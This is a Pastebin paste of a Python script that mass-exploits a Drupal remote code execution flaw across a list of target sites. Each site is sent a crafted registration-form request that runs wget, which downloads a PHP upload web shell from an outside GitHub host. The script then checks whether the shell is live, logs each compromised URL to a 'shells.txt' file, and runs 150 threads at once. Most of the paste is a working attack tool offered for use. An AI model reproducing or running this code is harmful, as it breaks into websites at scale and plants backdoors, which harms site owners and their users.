Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env
- import sys
- import requests
- from multiprocessing.dummy import Pool
- import time
- try:
- target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
- except IndexError:
- exit('Usage: m3.py list.txt')
- def progressbar(it, prefix = "", size = 1000):
- count = len(it)
- def _show(_i):
- x = int(size*_i/count)
- sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count))
- sys.stdout.flush()
- _show(0)
- for i, item in enumerate(it):
- yield item
- _show(i+1)
- sys.stdout.write("\n")
- sys.stdout.flush()
- toolbar_width = 30
- sys.stdout.write(":%s:" % (" " * toolbar_width))
- sys.stdout.flush()
- sys.stdout.write("\b" * (toolbar_width+1))
- for i in xrange(toolbar_width):
- time.sleep(0.01)
- sys.stdout.write("*")
- sys.stdout.flush()
- sys.stdout.write("\n")
- def slowprint(s):
- for c in s + '\n':
- sys.stdout.write(c)
- sys.stdout.flush() # defeat buffering
- time.sleep(60/90)
- print("------------------------------------------------------------------------")
- slowprint ("[-] Drupal RCE ")
- slowprint (" https://www.facebook.com/Remah.go.id/")
- payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
- headers = {'User-Agent': 'Mozilla 5.0'}
- def run(u):
- try:
- url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
- r = requests.post(url, data=payload, verify=False, headers=headers)
- if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text:
- print ('Uploaded Here:', u + '/payload.php')
- with open('shells.txt', mode='a') as d:
- d.write(u + '/payload.php\n')
- else:
- print(u, " -> Can't Exploit")
- except:
- pass
- mp = Pool(150)
- mp.map(run, target)
- mp.close()
- mp.join()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement